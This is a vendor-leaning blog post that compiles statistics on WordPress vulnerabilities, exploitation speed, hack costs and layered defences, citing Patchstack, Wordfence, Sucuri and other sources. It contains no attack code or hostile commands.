Every year, Patchstack publishes a whitepaper on the state of WordPress security. Every year, the numbers get worse. The 2026 edition dropped on February 25, and the headline numbers are hard to ignore.
This post pulls together 43 verified data points from 18 original research sources into the picture you need if you build, manage, or host WordPress sites. No speculation, no fear marketing, just numbers and what they mean for your workflow.
The full sourced version with inline citations lives on the WP Ghost research page. This is the developer-focused summary.
The Four Numbers That Define WordPress Security Right Now
Before getting into the breakdown, these four stats frame everything that follows:
- 11,334 new WordPress vulnerabilities recorded in 2025, a 42% increase year-on-year
- ~13,000 WordPress sites hacked per day, roughly 4.7 million annually
- 5 hours, the weighted median from vulnerability disclosure to mass exploitation
- 87.8% of WordPress-specific exploits bypass standard hosting firewalls
If you only remember four numbers from this post, those are the ones.
How Large Is the Attack Surface?
WordPress powers 43.5% of all websites on the internet (Hostinger, 2026). That's not a niche CMS. That's nearly half the web running on the same stack, with the same default paths, the same directory structure, and the same plugin ecosystem.
From an attacker's perspective, the economics are straightforward. Write one scanner, point it at the internet, and nearly every other site you hit is WordPress. The attacks don't need to be clever. They just need to be automated and fast.
Wordfence, the most widely deployed WordPress security plugin, blocks 55 million exploit attempts and over 6.4 billion brute force attacks every single month across its network (TDW Digital, 2025). That's the permanent baseline, not a spike.
Most of those attacks are not targeted. Bots scan millions of sites daily looking for the same fingerprints: a /wp-login.php path, an exposed version number in a meta tag, a plugin signature in the page source. They are not interested in your site specifically. They are interested in any site that looks like a standard WordPress installation.
11,334 Vulnerabilities: Where Are They Coming From?
Patchstack confirmed a record year. Not close to a record. Definitively the worst year on record, by a wide margin.
The growth over three years tells the story:
| Year | Vulnerabilities | Change |
|---|---|---|
| 2023 | ~5,900 | baseline |
| 2024 | ~7,966 | +35% |
| 2025 | 11,334 | +42% |
And Q1 2026 is not slowing down. In the first week of January 2026 alone, 333 new vulnerabilities were disclosed, with 120 of them having no patch when they went public (WebHostMost, Mar 2026). The weekly average heading into 2026 is 250+ plugin vulnerabilities per week, roughly 36 per day.
It's Not Core
The WordPress core team found exactly two vulnerabilities in all of 2025 (Patchstack 2026). Two.
The problem is the plugin ecosystem:
- 91% of vulnerabilities come from plugins
- 6% from themes
- 2% from core (those two)
Every plugin you install is a potential entry point. The average WordPress installation runs 20 to 30 plugins. The math is not complicated.
The Severity Jump
Highly exploitable vulnerabilities, the ones attackers weaponize at scale, increased by 113% year-on-year in 2025 (The Repository / Patchstack, Mar 2026). More high-severity CVEs were found in 2025 than in the previous two years combined.
AI-Generated Plugins Are Making It Worse
Patchstack's 2026 report specifically calls out "vibe coding," where developers use LLMs to generate plugin code and ship it without being able to audit what the model wrote. When the person shipping the code can't review it for security problems, vulnerabilities go live silently. This trend is accelerating, not stabilizing.
The 5-Hour Problem
Here is the number from Patchstack's 2026 report that fundamentally changes how you should think about WordPress security:
"The weighted median time to first mass exploitation was five hours."
- Patchstack, State of WordPress Security in 2026
Five hours from public disclosure to active mass exploitation.
The traditional advice, "keep your plugins updated," assumes you have time to react. For heavily targeted vulnerabilities, you often don't.
The exploitation timeline breaks down like this:
| Window | What happens |
|---|---|
| 0-5 hours | Median first mass exploitation attempt. Automated scanners watch disclosure feeds and deploy exploit code within hours. |
| Within 6 hours | 20% of top-targeted vulnerabilities are actively exploited. |
| Within 24 hours | 45%. By the time most site owners read about it in a newsletter, attacks have been running for a full day. |
| Within 7 days | 70%. Roughly when most people get around to clicking that update notification they've been ignoring. |
And what makes the 5-hour window even more dangerous:
46% of vulnerabilities had no patch available at the time of public disclosure (WP Edition / Patchstack, Feb 2026). There is no update to apply. The vulnerability is public, documented, actively scanned for, and the plugin is still broken.
Why? Because 52% of plugin developers do not patch before disclosure (Patchstack via Xictron, 2026). The researcher found the bug, reported it responsibly, waited the standard disclosure window, published, and the developer still hadn't shipped a fix.
Patchstack says it plainly: "Regular plugin updates are the second line of defence, but as attackers weaponize new vulnerabilities within mere hours, this is not a viable defence."
Where Do Hackers Actually Get In?
The vulnerability type distribution for 2025-2026:
| Attack Type | Share | Auth Required? |
|---|---|---|
| Cross-Site Scripting (XSS) | Dominant (~35-39%) | Often none |
| Cross-Site Request Forgery (CSRF) | ~19% | Existing session |
| Local File Inclusion (LFI) | ~12.6% | Often none |
| Broken Access Control | ~10.9% | Low-privilege |
| SQL Injection | ~7.2% | Often none |
XSS dominates because it's easy to introduce in plugin code and notoriously difficult to patch completely.
The critical detail: 57% of vulnerabilities in H1 2025 required no authentication whatsoever (Patchstack Mid-Year 2025). No login needed. No password to steal. Just a vulnerable plugin, installed and active.
What Attackers Leave Behind
Sucuri's data on what's found on compromised WordPress sites (Sucuri via Hostinger, 2026):
- 72.7% contain active malware
- 69.6% have unauthorized backdoors, persistent access the attacker can use later
- 46.7% have SEO spam injected, hidden keyword-stuffed content that triggers Google penalties
- 8.1% have phishing pages embedded within the site
The 2026 Patchstack and Monarx report adds an important shift: attackers are now injecting code directly into legitimate WordPress core, plugin, and theme files rather than dropping standalone malicious files. The traditional "scan and delete" approach to malware removal misses this entirely (The Repository, Mar 2026).
The Login Page Problem
In 2023, Wordfence blocked over 100 billion credential stuffing attacks from 74 million unique IP addresses. The vast majority targeted the standard /wp-login.php and /wp-admin paths. 81% of hacked WordPress sites involved weak or stolen passwords as a contributing factor (Sucuri and Wordfence via HowToWP).
If your login page is at the default URL, you are absorbing every automated attack that knows where to look.
Why Hosting Firewalls Are Not Enough
Managed WordPress hosting is expensive and comes with security messaging all over the pricing page. Those server-level firewalls are doing something, just not nearly enough.
87.8% of WordPress-specific exploits bypass standard hosting defenses (Patchstack via Xictron, 2026). Standard hosting defenses block only about 26% of WordPress-targeted attacks.
The reason is structural. Network and server firewalls were designed to block broad categories of malicious traffic: DDoS floods, port scans, known malicious IPs. They were not designed to understand the application-specific semantics of a stored XSS vulnerability in version 3.4.1 of a specific WordPress plugin. That requires application-layer intelligence.
Patchstack's 2026 conclusion: "In 2026, everybody needs deep visibility into what their websites are made of and put automated security measures in place to mitigate new security vulnerabilities in less than five hours."
The EU Cyber Resilience Act
By September 2026, all plugin and theme developers distributing software to EU users must have vulnerability disclosure programs in place by law. Whether this will meaningfully reduce the 52% non-patch-before-disclosure rate remains to be seen (Patchstack 2025 Whitepaper).
What Does a WordPress Hack Actually Cost?
The headline figure: $14,500 average total recovery cost for a small business (Colorlib, Xictron 2026).
That includes malware removal, emergency developer time, downtime, lost revenue, and the months of SEO work required to undo injected spam links and Google manual penalties. Against approximately $8/month for active protection, the math is not close.
The Melapress 2025 Security Survey found that 59.2% of WordPress professionals say the biggest impact of getting hacked is the loss of time, not money. The late nights, the emergency calls, the stress of rebuilding something that was working fine yesterday.
A real scenario: A WooCommerce store gets flagged by Google on a Friday afternoon. Malware was redirecting the checkout page to a phishing site. By Monday morning, it's been three days. Google Search Console has a manual penalty notice. PayPal suspended the account. Finding the backdoor, cleaning injected files, restoring backups, requesting Google review: 11 days total. $4,200 in lost orders. $1,200 for emergency cleanup. $5,400 total. The security plugin subscription they had skipped: $96 per year.
Are WordPress Site Owners Actually Prepared?
The Melapress WordPress Security Survey 2025 maps preparation against concern, and the gap is uncomfortable. Site owners rate their concern at 7.8 out of 10 on average. Two-thirds scored it 8 or higher.
And yet:
- Only 27% have a breach recovery plan. More than 73% have no documented response to "what do we do when this happens?"
- Only 27% implement team security training
- Among those who had experienced account compromises, 30% still hadn't implemented any user account security controls
- Only 59% use a WordPress activity log to detect suspicious behavior
- Web designers and developers, the professionals who build WordPress sites, are the least likely to use automatic updates, at 32% and 33% respectively
There's also an outsourcing gap: 31% of in-house managers have a recovery plan, but only 13% of those relying on third parties do (Melapress, Oct 2025).
If you've outsourced security, ask your provider directly: what is the plan if we get hacked?
What Does the Data Say Actually Works?
The genuinely good news: the overwhelming majority of WordPress hacks are preventable. OsomStudio's 2026 security analysis estimates that basic security hygiene stops more than 90% of attacks (OsomStudio, 2026).
Most attackers are opportunistic. When a site looks harder to target than average, they move on.
Based on the attack data above, effective WordPress hack prevention works in three layers:
Layer 1: Disappear from Scanners
Automated scanners identify WordPress installations by their fingerprints: version numbers in meta tags, the /wp-login.php path, the readme.html file in root, plugin signatures in source code.
Remove those signals and mass-scanning tools can't confirm you are running WordPress. They move on. This is attack surface reduction as a first defense, and it works against every automated scanner that hasn't already fingerprinted your site.
The data supports why this matters: 57% of vulnerabilities require zero authentication, meaning fingerprint detection is the first step in every automated attack chain.
Tools that do this: WP Ghost (full path security, 115+ features in the free version), WPS Hide Login (login path only), or manual rewrite rules if you prefer to roll your own.
Layer 2: Filter at the Application Layer
What hosting firewalls miss (87.8% of it), an application-layer firewall catches:
- 8G Firewall rules for SQL injection, XSS, file inclusion, directory traversal
- Brute force protection + 2FA to address the 81% of hacks involving credential attacks
- XML-RPC and REST API restrictions to close attack surfaces most sites don't need open
- Geo-blocking to reduce automated attack volume from high-risk regions
-
Moving the login page off
/wp-login.php, since most automated credential attacks target that path specifically
Tools: WP Ghost (built-in 7G/8G firewall, 2FA with passkeys), Wordfence (endpoint firewall + scanner), Sucuri (cloud WAF), or a combination.
Layer 3: Monitor and Detect
Activity logging, file integrity monitoring, and anomaly alerts are the difference between catching a compromise in hour one and discovering it three months later when Google sends a penalty notice. Given that 69.6% of hacked sites contain unauthorized backdoors, detection speed directly affects total recovery cost.
Tools: WP Ghost Security Threats Log (Premium), Wordfence live traffic, Sucuri audit log, or WP Activity Log.
Three Things You Can Do This Week
If this wall of stats is overwhelming, start here:
1. Audit your plugins
List every plugin on your site. For each one: is it actively maintained? When was the last update? Does your site actually need it? Remove anything unused. Every inactive plugin is an attack surface with zero upside.
2. Check your login URL
If your login page is still at /wp-login.php or /wp-admin, every automated brute-force campaign knows exactly where to hit. Changing the login path takes about two minutes and removes your site from most credential-stuffing campaigns immediately.
3. Write a one-page recovery plan
Answer: who do I call, what do I check first, where are my backups, how do I put the site in maintenance mode? The 73% without a plan make recovery take 3-4x longer, not because they are less capable, but because they are making decisions under stress without a framework.
Summary
According to data compiled from 18 original research sources:
- 11,334 new WordPress vulnerabilities in 2025, the highest ever, a 42% increase year-on-year (Patchstack, Feb 2026)
- ~13,000 WordPress sites hacked per day, totaling 4.7 million annually (WPMayor via Sophos)
- 5 hours median from disclosure to mass exploitation, with 46% of vulnerabilities having no patch at the time of disclosure (Patchstack 2026)
- 87.8% of WordPress-specific exploits bypass hosting firewalls (Patchstack via Xictron 2026)
- $14,500 average recovery cost for a small business, versus approximately $8/month for proactive protection (Colorlib, Xictron 2026)
- ~90% of attacks are preventable through basic security hygiene (OsomStudio 2026)
The full version with all 43 data points and inline source citations: WordPress Security Statistics 2025-2026
Data sourced from Patchstack 2026 Whitepaper, Patchstack Mid-Year 2025, Wordfence, Sucuri, Melapress 2025 Security Survey, OsomStudio 2026, Hostinger, WPMayor/Sophos, Colorlib, Xictron 2026, TDW Digital 2025, WebHostMost 2026, WP Edition, The Repository/Patchstack, and HowToWP. All numbers verified as of April 2026.
Top comments (1)
This is a powerful, data-driven wake-up call that shifts WordPress security from “best practice” to “urgent necessity.” The 5-hour exploitation window and the dominance of plugin vulnerabilities really stand out, it makes it clear that reactive security is no longer enough and proactive hardening is the only viable approach